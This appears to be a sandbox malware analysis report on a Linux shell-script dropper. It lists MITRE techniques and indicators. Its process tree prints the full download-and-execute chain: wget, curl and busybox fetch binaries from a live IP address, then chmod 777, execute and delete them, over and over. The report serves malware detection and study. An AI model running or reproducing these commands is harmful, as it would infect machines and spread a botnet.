a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f

Analysis

max time kernel
51s
max time network
54s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
21-11-2024 07:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh
Size

10KB
MD5

1da436586858e8b894006c782004e93c
SHA1

e3c42a2411cc4d0870b25992411989a5686a2fbe
SHA256

a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f
SHA512

6c016bdef621440d8e88e3b2bf8123d27a6e4805e24e5249308620aca20784ba6b4f4afeb4c4ec1f4fd9a7e109c811e883f16e1901ba09e491fc9885312d7c4c
SSDEEP

192:m5ZIaxxR5RRW7iuv7nTrF7m83n08p2KWwCOBv7K7RRpUcnXhXhXEtDNYIk08pgKo:zlXDF5Wkusoe

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 26 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
772	chmod
855	chmod
887	chmod
905	chmod
913	chmod
696	chmod
709	chmod
881	chmod
919	chmod
758	chmod
804	chmod
815	chmod
830	chmod
925	chmod
703	chmod
719	chmod
746	chmod
787	chmod
798	chmod
843	chmod
867	chmod
875	chmod
684	chmod
732	chmod
893	chmod
899	chmod

Executes dropped EXE 26 IoCs

Processes:

1rQQQWtspmL1kpT95bhh7hVyerI0m3O9LstfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMsB9tKithJtx2VaxOgudRvH49IF0LUCjuBWsZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8GzTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBbp4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKheUEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQcC9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD6tNBriFC2AOibUG6vjDJJR1VULNOIHpapnL2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PMY4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3zTJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZUEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns66tNBriFC2AOibUG6vjDJJR1VULNOIHpapnL2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PMY4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3zTJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZnCucIrzHaAbO3wxaMfCyL98wydNfGmKFQcC9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhDtfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMsB9tKithJtx2VaxOgudRvH49IF0LUCjuBWsZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls

Checks CPU configuration 1 TTPs 26 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 52 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 20 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

wgetcurlwgetTJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZwgetwgetL2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PMrmcurlrmbusyboxcurlbusyboxTJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZrmbusyboxcurlL2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PMrmbusybox

pid	process
801	wget
802	curl
819	wget
832	TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
870	wget
884	wget
805	L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
833	rm
885	curl
889	rm
803	busybox
822	curl
874	busybox
888	TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
806	rm
828	busybox
873	curl
876	L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
877	rm
886	busybox

Writes file to tmp directory 26 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD	curl
File opened for modification	/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ	curl
File opened for modification	/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs	curl
File opened for modification	/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls	curl
File opened for modification	/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ	curl
File opened for modification	/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm	curl
File opened for modification	/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn	curl
File opened for modification	/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls	curl
File opened for modification	/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G	curl
File opened for modification	/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb	curl
File opened for modification	/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc	curl
File opened for modification	/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM	curl
File opened for modification	/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z	curl
File opened for modification	/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc	curl
File opened for modification	/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD	curl
File opened for modification	/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G	curl
File opened for modification	/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs	curl
File opened for modification	/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs	curl
File opened for modification	/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6	curl
File opened for modification	/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs	curl
File opened for modification	/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM	curl
File opened for modification	/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe	curl
File opened for modification	/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm	curl
File opened for modification	/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn	curl
File opened for modification	/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z	curl
File opened for modification	/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6	curl

/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh
/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh
1⤵
PID:657
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:662
- /usr/bin/wget
  wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  PID:667
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:673
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  PID:681
- /bin/chmod
  chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  - File and Directory Permissions Modification
  PID:684
- /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  ./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  - Executes dropped EXE
  PID:685
- /bin/rm
  rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  PID:686
- /usr/bin/wget
  wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  PID:688
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:690
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  PID:694
- /bin/chmod
  chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  - File and Directory Permissions Modification
  PID:696
- /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  ./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  - Executes dropped EXE
  PID:697
- /bin/rm
  rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  PID:698
- /usr/bin/wget
  wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
  2⤵
  PID:699
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:701
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
  2⤵
  PID:702
- /bin/chmod
  chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
  2⤵
  - File and Directory Permissions Modification
  PID:703
- /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
  ./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
  2⤵
  - Executes dropped EXE
  PID:704
- /bin/rm
  rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
  2⤵
  PID:705
- /usr/bin/wget
  wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
  2⤵
  PID:706
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:707
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
  2⤵
  PID:708
- /bin/chmod
  chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
  2⤵
  - File and Directory Permissions Modification
  PID:709
- /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
  ./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
  2⤵
  - Executes dropped EXE
  PID:710
- /bin/rm
  rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
  2⤵
  PID:711
- /usr/bin/wget
  wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
  2⤵
  PID:712
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:714
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
  2⤵
  PID:718
- /bin/chmod
  chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
  2⤵
  - File and Directory Permissions Modification
  PID:719
- /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
  ./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
  2⤵
  - Executes dropped EXE
  PID:721
- /bin/rm
  rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
  2⤵
  PID:722
- /usr/bin/wget
  wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
  2⤵
  PID:724
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:726
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
  2⤵
  PID:730
- /bin/chmod
  chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
  2⤵
  - File and Directory Permissions Modification
  PID:732
- /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
  ./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
  2⤵
  - Executes dropped EXE
  PID:733
- /bin/rm
  rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
  2⤵
  PID:734
- /usr/bin/wget
  wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
  2⤵
  PID:736
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:738
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
  2⤵
  PID:744
- /bin/chmod
  chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
  2⤵
  - File and Directory Permissions Modification
  PID:746
- /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
  ./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
  2⤵
  - Executes dropped EXE
  PID:747
- /bin/rm
  rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
  2⤵
  PID:749
- /usr/bin/wget
  wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
  2⤵
  PID:750
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:753
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
  2⤵
  PID:756
- /bin/chmod
  chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
  2⤵
  - File and Directory Permissions Modification
  PID:758
- /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
  ./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
  2⤵
  - Executes dropped EXE
  PID:760
- /bin/rm
  rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
  2⤵
  PID:761
- /usr/bin/wget
  wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
  2⤵
  PID:762
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:765
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
  2⤵
  PID:768
- /bin/chmod
  chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
  2⤵
  - File and Directory Permissions Modification
  PID:772
- /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
  ./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
  2⤵
  - Executes dropped EXE
  PID:773
- /bin/rm
  rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
  2⤵
  PID:775
- /usr/bin/wget
  wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
  2⤵
  PID:776
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:781
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
  2⤵
  PID:786
- /bin/chmod
  chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
  2⤵
  - File and Directory Permissions Modification
  PID:787
- /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
  ./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
  2⤵
  - Executes dropped EXE
  PID:789
- /bin/rm
  rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
  2⤵
  PID:790
- /usr/bin/wget
  wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
  2⤵
  PID:791
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:794
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
  2⤵
  PID:797
- /bin/chmod
  chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
  2⤵
  - File and Directory Permissions Modification
  PID:798
- /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
  ./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
  2⤵
  - Executes dropped EXE
  PID:799
- /bin/rm
  rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
  2⤵
  PID:800
- /usr/bin/wget
  wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
  2⤵
  - System Network Configuration Discovery
  PID:801
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:802
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
  2⤵
  - System Network Configuration Discovery
  PID:803
- /bin/chmod
  chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
  2⤵
  - File and Directory Permissions Modification
  PID:804
- /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
  ./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:805
- /bin/rm
  rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
  2⤵
  - System Network Configuration Discovery
  PID:806
- /usr/bin/wget
  wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
  2⤵
  PID:807
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:811
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
  2⤵
  PID:813
- /bin/chmod
  chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
  2⤵
  - File and Directory Permissions Modification
  PID:815
- /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
  ./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
  2⤵
  - Executes dropped EXE
  PID:816
- /bin/rm
  rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
  2⤵
  PID:817
- /usr/bin/wget
  wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
  2⤵
  - System Network Configuration Discovery
  PID:819
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:822
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
  2⤵
  - System Network Configuration Discovery
  PID:828
- /bin/chmod
  chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
  2⤵
  - File and Directory Permissions Modification
  PID:830
- /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
  ./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:832
- /bin/rm
  rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
  2⤵
  - System Network Configuration Discovery
  PID:833
- /usr/bin/wget
  wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
  2⤵
  PID:834
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:837
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
  2⤵
  PID:840
- /bin/chmod
  chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
  2⤵
  - File and Directory Permissions Modification
  PID:843
- /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
  ./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
  2⤵
  - Executes dropped EXE
  PID:844
- /bin/rm
  rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
  2⤵
  PID:845
- /usr/bin/wget
  wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
  2⤵
  PID:846
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:849
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
  2⤵
  PID:852
- /bin/chmod
  chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
  2⤵
  - File and Directory Permissions Modification
  PID:855
- /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
  ./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
  2⤵
  - Executes dropped EXE
  PID:856
- /bin/rm
  rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
  2⤵
  PID:857
- /usr/bin/wget
  wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
  2⤵
  PID:858
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:861
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
  2⤵
  PID:865
- /bin/chmod
  chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
  2⤵
  - File and Directory Permissions Modification
  PID:867
- /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
  ./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
  2⤵
  - Executes dropped EXE
  PID:868
- /bin/rm
  rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
  2⤵
  PID:869
- /usr/bin/wget
  wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
  2⤵
  - System Network Configuration Discovery
  PID:870
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:873
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
  2⤵
  - System Network Configuration Discovery
  PID:874
- /bin/chmod
  chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
  2⤵
  - File and Directory Permissions Modification
  PID:875
- /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
  ./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:876
- /bin/rm
  rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
  2⤵
  - System Network Configuration Discovery
  PID:877
- /usr/bin/wget
  wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
  2⤵
  PID:878
